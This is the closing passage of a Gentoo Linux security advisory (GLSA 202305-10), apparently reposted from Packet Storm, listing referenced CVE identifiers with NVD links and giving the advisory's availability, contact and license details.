      https://nvd.nist.gov/vuln/detail/CVE-2022-4189  
[ 25 ] CVE-2022-4190  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4190  
[ 26 ] CVE-2022-4191  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4191  
[ 27 ] CVE-2022-4192  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4192  
[ 28 ] CVE-2022-4193  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4193  
[ 29 ] CVE-2022-4194  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4194  
[ 30 ] CVE-2022-4195  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4195  
[ 31 ] CVE-2022-4436  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4436  
[ 32 ] CVE-2022-4437  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4437  
[ 33 ] CVE-2022-4438  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4438  
[ 34 ] CVE-2022-4439  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4439  
[ 35 ] CVE-2022-4440  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4440  
[ 36 ] CVE-2022-41115  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41115  
[ 37 ] CVE-2022-44688  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44688  
[ 38 ] CVE-2022-44708  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44708  
[ 39 ] CVE-2023-0128  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0128  
[ 40 ] CVE-2023-0129  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0129  
[ 41 ] CVE-2023-0130  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0130  
[ 42 ] CVE-2023-0131  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0131  
[ 43 ] CVE-2023-0132  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0132  
[ 44 ] CVE-2023-0133  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0133  
[ 45 ] CVE-2023-0134  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0134  
[ 46 ] CVE-2023-0135  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0135  
[ 47 ] CVE-2023-0136  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0136  
[ 48 ] CVE-2023-0137  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0137  
[ 49 ] CVE-2023-0138  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0138  
[ 50 ] CVE-2023-0139  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0139  
[ 51 ] CVE-2023-0140  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0140  
[ 52 ] CVE-2023-0141  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0141  
[ 53 ] CVE-2023-21719  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21719  
[ 54 ] CVE-2023-21775  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21775  
[ 55 ] CVE-2023-21795  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21795  
[ 56 ] CVE-2023-21796  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21796

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Source

Packet Storm